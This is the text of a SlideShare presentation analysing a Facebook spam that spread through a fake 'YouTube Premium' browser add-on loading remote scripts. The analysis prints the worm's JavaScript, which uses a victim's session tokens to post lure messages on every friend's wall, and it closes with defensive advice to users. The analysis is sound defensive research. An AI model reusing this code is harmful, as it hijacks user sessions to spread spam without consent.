SlideShare uma empresa Scribd logo

An analysis of a facebook spam exploited through browser addons

Prajwal Panchmahalkar
Prajwal Panchmahalkar

This paper aims to analyse a newly appeared facebook spam that spreads through installation of browser add-ons

EducaçãoTecnologiaNotícias e política
1 de 7
Baixar para ler offline
Analysis of a Facebook spam exploited through browser add-ons/extensions Prajwal Panchmahalkar panchmahalkar@gmail.com Image courtesy : http://contactdubai.com
Though spam on Facebook is not new to us, however I find this particular spam leveraged very smartly and it was a very interesting analysis to me because I was surprised to see what extent the spammers can go. Today one of my friends on Facebook was so annoyed with this spam which was posting on all his friends walls, which looked like this: I was asked what to do, looking at it, it surely looked to be just like every other spam I suggested him all the usual measures like remove all his Facebook applications that are doubtful and clear his browser data. But it continued even after that so I decided to look into it. First the URL, the spam seems to be originated from http:// nwuuwiwiwiw.blogspot.com/, looking at the blog it looked like this, Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin (wonder what a “premium” for YouTube would be!!).
So decided to look into the page source, here is what it contained: So this would install the browser add-on/extension based on the browser, the else part of the code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; the youtube.js was one to look into: Ah, http://mieneeueueu.co.cc/yt/script.js a remote script
Navigating to it I found Another script at http://mieneeueueu.co.cc/yt/extra.js finally this was the Final script ;) Now let’s analyze this script, Remember the else part earlier in the first code snippet which I promised to discuss later? It contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js also contains this part to redirect the user to this URL after the installation of the add-on/extension, navigating to that link I found This page actually contained that video embedded; finally the person must be happy to see this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)
As the person views the video and finishes it, this script stealing the browser cookies gets enough time to spread the spam on all the friends’ walls Further analyzing the code, The code here assigns some random variables for the post so that it won’t be similar on all the walls. So using all the variables post_form_id to var p3 make large combinations (use of mathematical combinations, smart eh?). Looking into the main part of the code where the message is generated and sent for post for (var f = 0; f < b; f++) { if (a['payload']['entries'][f]['uid'] != user_id) { message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' '); var g = new XMLHttpRequest(); d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; title = '[VIDEO] Yeahh!! It happens on Live Television!'; summary = 'Lol Checkout this video its very embracing moment for her'; imagen = 'http://i.imgur.com/f9PE7.jpg'; e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UI ThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary] =' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' +
Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][im ages][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=- 1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][exp ires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100& xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&pri vacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest'; g['open']('POST', d, true); g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); g['setRequestHeader']('Content-length', e['length']); g['setRequestHeader']('Connection', 'keep-alive'); g['onreadystatechange'] = function () {}; g['send'](e); Looking into the above snippet of code it is clear that it uses the grabbed cookies to post the spam on others walls, this script also contained an unfinished part left out (may be the spammer was happy with this for now or grab some time from the user to finish the spam effectively) with a link to http://rihannaxgirlzke.blogspot.com/ which looked like, However looking into the source it didn’t contain any script or rather it was a static page with the content actually an image file.
Conclusion: Though social networking sites often fall prey to such scams/spams it is much of users consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is genuine video from a valid link, in this case, 1. Looking at the post the link from where the post originated is clearly youtube.com (underlined black) 2. Further the thumbnail preview for videos has been changed the play button now is transparent black while the one in the spam we discussed had a blue play button (underlined red) 3. Always install extensions from known sources a. Chrome – from chrome store b. Firefox – Mozilla add-ons 4. Use add-ons like no-script, No-Ads to avoid such scripts. 5. Stay away from scams/spams that promise to provide some gift or money.

Recomendados

Wordpress Security
Wordpress SecurityWordpress Security
Wordpress Security
Rupok Chowdhury Protik
 
Remedie OSDC.TW
Remedie OSDC.TWRemedie OSDC.TW
Remedie OSDC.TW
Tatsuhiko Miyagawa
 
Banner Presentation
Banner PresentationBanner Presentation
Banner Presentation
Sarahcondliffe
 
Adding the Awesomesauce Flavor with IE9 Pinned Sites
Adding the Awesomesauce Flavor with IE9 Pinned SitesAdding the Awesomesauce Flavor with IE9 Pinned Sites
Adding the Awesomesauce Flavor with IE9 Pinned Sites
John Bristowe
 
I haz your mouse clicks and key strokes
I haz your mouse clicks and key strokesI haz your mouse clicks and key strokes
I haz your mouse clicks and key strokes
Akash Mahajan
 
BYOD Security Scanning
BYOD Security ScanningBYOD Security Scanning
BYOD Security Scanning
MAX Risk Intelligence by LOGICnow
 
MultiMedia Help Guide
MultiMedia Help GuideMultiMedia Help Guide
MultiMedia Help Guide
Chartered Management Institute
 
Website Research
Website ResearchWebsite Research
Website Research
MattCheetham
 

Recomendados

Wordpress Security
Wordpress SecurityWordpress Security
Wordpress Security
Rupok Chowdhury Protik
 
Remedie OSDC.TW
Remedie OSDC.TWRemedie OSDC.TW
Remedie OSDC.TW
Tatsuhiko Miyagawa
 
Banner Presentation
Banner PresentationBanner Presentation
Banner Presentation
Sarahcondliffe
 
Adding the Awesomesauce Flavor with IE9 Pinned Sites
Adding the Awesomesauce Flavor with IE9 Pinned SitesAdding the Awesomesauce Flavor with IE9 Pinned Sites
Adding the Awesomesauce Flavor with IE9 Pinned Sites
John Bristowe
 
I haz your mouse clicks and key strokes
I haz your mouse clicks and key strokesI haz your mouse clicks and key strokes
I haz your mouse clicks and key strokes
Akash Mahajan
 
BYOD Security Scanning
BYOD Security ScanningBYOD Security Scanning
BYOD Security Scanning
MAX Risk Intelligence by LOGICnow
 
MultiMedia Help Guide
MultiMedia Help GuideMultiMedia Help Guide
MultiMedia Help Guide
Chartered Management Institute
 
Website Research
Website ResearchWebsite Research
Website Research
MattCheetham
 
FVCP Ad Words
FVCP Ad WordsFVCP Ad Words
FVCP Ad Words
guest1575bb
 
Php2pdf
Php2pdfPhp2pdf
Php2pdf
Eric Michalsen
 
Drupal Video Presentation
Drupal Video PresentationDrupal Video Presentation
Drupal Video Presentation
Eric Michalsen
 
Free bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hourFree bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hour
caidedarrell
 
Make+$50 $75
Make+$50 $75Make+$50 $75
Make+$50 $75
fernando cerato
 
Share cash sucess! review 1, make money online from home
Share cash sucess! review 1, make money online from homeShare cash sucess! review 1, make money online from home
Share cash sucess! review 1, make money online from home
Duy Lên
 
Tech 20 Session 10
Tech 20 Session 10Tech 20 Session 10
Tech 20 Session 10
Greg Dhuyvetter
 
Technologies i have used
Technologies i have usedTechnologies i have used
Technologies i have used
GabyV45
 
5 Useful and Fun Website Links
5 Useful and Fun Website Links5 Useful and Fun Website Links
5 Useful and Fun Website Links
Charlie
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
Esteban Bedoya
 
Internet safety
Internet safetyInternet safety
Internet safety
Robin Nappi
 
My Story With Flickr
My Story With FlickrMy Story With Flickr
My Story With Flickr
Jose Martinez
 
Website Hacking Oldie
Website Hacking OldieWebsite Hacking Oldie
Website Hacking Oldie
Aung Khant
 
Evaluation question 6
Evaluation question 6Evaluation question 6
Evaluation question 6
arslideshare12
 
Adding flash animation to a website
Adding flash animation to a websiteAdding flash animation to a website
Adding flash animation to a website
Bubblefruit.com
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POC
E Hacking
 
What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011
Iskandar Najmuddin
 
Pixlr and small apps in the classroom
Pixlr and small apps in the classroomPixlr and small apps in the classroom
Pixlr and small apps in the classroom
ArtfulArtsyAmy
 
Access youtube in china! china worldchat
Access youtube in china! china worldchatAccess youtube in china! china worldchat
Access youtube in china! china worldchat
榴梿 坊林
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
n|u - The Open Security Community
 
Matriux Leandros - BSidesLV 2013
Matriux Leandros - BSidesLV 2013Matriux Leandros - BSidesLV 2013
Matriux Leandros - BSidesLV 2013
Prajwal Panchmahalkar
 
Energy Aware Shortest Path Minded SPIN
Energy Aware Shortest Path Minded SPINEnergy Aware Shortest Path Minded SPIN
Energy Aware Shortest Path Minded SPIN
Prajwal Panchmahalkar
 

Mais conteúdo relacionado

Semelhante a An analysis of a facebook spam exploited through browser addons

Technologies i have used
Technologies i have usedTechnologies i have used
Technologies i have used
GabyV45
 
Website Hacking Oldie
Website Hacking OldieWebsite Hacking Oldie
Website Hacking Oldie
Aung Khant
 
Adding flash animation to a website
Adding flash animation to a websiteAdding flash animation to a website
Adding flash animation to a website
Bubblefruit.com
 
Access youtube in china! china worldchat
Access youtube in china! china worldchatAccess youtube in china! china worldchat
Access youtube in china! china worldchat
榴梿 坊林
 

Semelhante a An analysis of a facebook spam exploited through browser addons (20)

FVCP Ad Words
FVCP Ad WordsFVCP Ad Words
FVCP Ad Words
 
Php2pdf
Php2pdfPhp2pdf
Php2pdf
 
Drupal Video Presentation
Drupal Video PresentationDrupal Video Presentation
Drupal Video Presentation
 
Free bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hourFree bitcoin auto pilot method $30 per hour
Free bitcoin auto pilot method $30 per hour
 
Make+$50 $75
Make+$50 $75Make+$50 $75
Make+$50 $75
 
Share cash sucess! review 1, make money online from home
Share cash sucess! review 1, make money online from homeShare cash sucess! review 1, make money online from home
Share cash sucess! review 1, make money online from home
 
Tech 20 Session 10
Tech 20 Session 10Tech 20 Session 10
Tech 20 Session 10
 
Technologies i have used
Technologies i have usedTechnologies i have used
Technologies i have used
 
5 Useful and Fun Website Links
5 Useful and Fun Website Links5 Useful and Fun Website Links
5 Useful and Fun Website Links
 
Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)Hacking with experts (by anurag dwivedi)
Hacking with experts (by anurag dwivedi)
 
Internet safety
Internet safetyInternet safety
Internet safety
 
My Story With Flickr
My Story With FlickrMy Story With Flickr
My Story With Flickr
 
Website Hacking Oldie
Website Hacking OldieWebsite Hacking Oldie
Website Hacking Oldie
 
Evaluation question 6
Evaluation question 6Evaluation question 6
Evaluation question 6
 
Adding flash animation to a website
Adding flash animation to a websiteAdding flash animation to a website
Adding flash animation to a website
 
WhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POCWhatsApp Chat Hacking/Stealing POC
WhatsApp Chat Hacking/Stealing POC
 
What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011What's New on the Facebook Platform, May 2011
What's New on the Facebook Platform, May 2011
 
Pixlr and small apps in the classroom
Pixlr and small apps in the classroomPixlr and small apps in the classroom
Pixlr and small apps in the classroom
 
Access youtube in china! china worldchat
Access youtube in china! china worldchatAccess youtube in china! china worldchat
Access youtube in china! china worldchat
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
 

Mais de Prajwal Panchmahalkar

Matriux Leandros - BSidesLV 2013
Matriux Leandros - BSidesLV 2013Matriux Leandros - BSidesLV 2013
Matriux Leandros - BSidesLV 2013
Prajwal Panchmahalkar
 
Energy Aware Shortest Path Minded SPIN
Energy Aware Shortest Path Minded SPINEnergy Aware Shortest Path Minded SPIN
Energy Aware Shortest Path Minded SPIN
Prajwal Panchmahalkar
 
Energy Aware Fault Tolerant SPMS Protocol in Wireless Sensor Networks
Energy Aware Fault Tolerant SPMS Protocol in Wireless Sensor NetworksEnergy Aware Fault Tolerant SPMS Protocol in Wireless Sensor Networks
Energy Aware Fault Tolerant SPMS Protocol in Wireless Sensor Networks
Prajwal Panchmahalkar
 
Fault tolerant energy aware data dissemination protocol in WSN
Fault tolerant energy aware data dissemination protocol in WSNFault tolerant energy aware data dissemination protocol in WSN
Fault tolerant energy aware data dissemination protocol in WSN
Prajwal Panchmahalkar
 
Energy aware efficient geographic routing in lossy wireless Networks
Energy aware efficient geographic routing in lossy wireless NetworksEnergy aware efficient geographic routing in lossy wireless Networks
Energy aware efficient geographic routing in lossy wireless Networks
Prajwal Panchmahalkar
 
[null] Iso 27001 a business view by Sripathi
[null] Iso 27001 a business view by Sripathi[null] Iso 27001 a business view by Sripathi
[null] Iso 27001 a business view by Sripathi
Prajwal Panchmahalkar
 

Mais de Prajwal Panchmahalkar (16)

Matriux Leandros - BSidesLV 2013
Matriux Leandros - BSidesLV 2013Matriux Leandros - BSidesLV 2013
Matriux Leandros - BSidesLV 2013
 
Energy Aware Shortest Path Minded SPIN
Energy Aware Shortest Path Minded SPINEnergy Aware Shortest Path Minded SPIN
Energy Aware Shortest Path Minded SPIN
 
Energy Aware Fault Tolerant SPMS Protocol in Wireless Sensor Networks
Energy Aware Fault Tolerant SPMS Protocol in Wireless Sensor NetworksEnergy Aware Fault Tolerant SPMS Protocol in Wireless Sensor Networks
Energy Aware Fault Tolerant SPMS Protocol in Wireless Sensor Networks
 
Fault tolerant energy aware data dissemination protocol in WSN
Fault tolerant energy aware data dissemination protocol in WSNFault tolerant energy aware data dissemination protocol in WSN
Fault tolerant energy aware data dissemination protocol in WSN
 
Energy aware efficient geographic routing in lossy wireless Networks
Energy aware efficient geographic routing in lossy wireless NetworksEnergy aware efficient geographic routing in lossy wireless Networks
Energy aware efficient geographic routing in lossy wireless Networks
 
Maanav Jugaad - Social Engineering
Maanav Jugaad - Social EngineeringMaanav Jugaad - Social Engineering
Maanav Jugaad - Social Engineering
 
[null]Iso 27001 a business view
[null]Iso 27001 a business view[null]Iso 27001 a business view
[null]Iso 27001 a business view
 
[null] Iso 27001 a business view by Sripathi
[null] Iso 27001 a business view by Sripathi[null] Iso 27001 a business view by Sripathi
[null] Iso 27001 a business view by Sripathi
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Facebook Attacks By dinesh
Facebook Attacks By dineshFacebook Attacks By dinesh
Facebook Attacks By dinesh
 
Brute force
Brute forceBrute force
Brute force
 
Network concepts
Network conceptsNetwork concepts
Network concepts
 
Matriux
MatriuxMatriux
Matriux
 
Security
SecuritySecurity
Security
 
Null who and_where (1)
Null who and_where (1)Null who and_where (1)
Null who and_where (1)
 
W3AF|null
W3AF|nullW3AF|null
W3AF|null
 

Último

Salient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsSalient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functions
KarakKing
 

Último (20)

This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
Salient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsSalient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functions
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibit
 
Plant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptxPlant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptx
 
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
 
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptxExploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structure
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - English
 
Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptx
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docx
 
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
 
SOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning PresentationSOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning Presentation
 
How to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptxHow to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptx
 

An analysis of a facebook spam exploited through browser addons

  • 1. Analysis of a Facebook spam exploited through browser add-ons/extensions Prajwal Panchmahalkar panchmahalkar@gmail.com Image courtesy : http://contactdubai.com
  • 2. Though spam on Facebook is not new to us, however I find this particular spam leveraged very smartly and it was a very interesting analysis to me because I was surprised to see what extent the spammers can go. Today one of my friends on Facebook was so annoyed with this spam which was posting on all his friends walls, which looked like this: I was asked what to do, looking at it, it surely looked to be just like every other spam I suggested him all the usual measures like remove all his Facebook applications that are doubtful and clear his browser data. But it continued even after that so I decided to look into it. First the URL, the spam seems to be originated from http:// nwuuwiwiwiw.blogspot.com/, looking at the blog it looked like this, Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin (wonder what a “premium” for YouTube would be!!).
  • 3. So decided to look into the page source, here is what it contained: So this would install the browser add-on/extension based on the browser, the else part of the code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; the youtube.js was one to look into: Ah, http://mieneeueueu.co.cc/yt/script.js a remote script
  • 4. Navigating to it I found Another script at http://mieneeueueu.co.cc/yt/extra.js finally this was the Final script ;) Now let’s analyze this script, Remember the else part earlier in the first code snippet which I promised to discuss later? It contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js also contains this part to redirect the user to this URL after the installation of the add-on/extension, navigating to that link I found This page actually contained that video embedded; finally the person must be happy to see this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)
  • 5. As the person views the video and finishes it, this script stealing the browser cookies gets enough time to spread the spam on all the friends’ walls Further analyzing the code, The code here assigns some random variables for the post so that it won’t be similar on all the walls. So using all the variables post_form_id to var p3 make large combinations (use of mathematical combinations, smart eh?). Looking into the main part of the code where the message is generated and sent for post for (var f = 0; f < b; f++) { if (a['payload']['entries'][f]['uid'] != user_id) { message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' '); var g = new XMLHttpRequest(); d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; title = '[VIDEO] Yeahh!! It happens on Live Television!'; summary = 'Lol Checkout this video its very embracing moment for her'; imagen = 'http://i.imgur.com/f9PE7.jpg'; e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UI ThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary] =' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' +
  • 6. Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][im ages][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=- 1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][exp ires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100& xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&pri vacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest'; g['open']('POST', d, true); g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); g['setRequestHeader']('Content-length', e['length']); g['setRequestHeader']('Connection', 'keep-alive'); g['onreadystatechange'] = function () {}; g['send'](e); Looking into the above snippet of code it is clear that it uses the grabbed cookies to post the spam on others walls, this script also contained an unfinished part left out (may be the spammer was happy with this for now or grab some time from the user to finish the spam effectively) with a link to http://rihannaxgirlzke.blogspot.com/ which looked like, However looking into the source it didn’t contain any script or rather it was a static page with the content actually an image file.
  • 7. Conclusion: Though social networking sites often fall prey to such scams/spams it is much of users consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is genuine video from a valid link, in this case, 1. Looking at the post the link from where the post originated is clearly youtube.com (underlined black) 2. Further the thumbnail preview for videos has been changed the play button now is transparent black while the one in the spam we discussed had a blue play button (underlined red) 3. Always install extensions from known sources a. Chrome – from chrome store b. Firefox – Mozilla add-ons 4. Use add-ons like no-script, No-Ads to avoid such scripts. 5. Stay away from scams/spams that promise to provide some gift or money.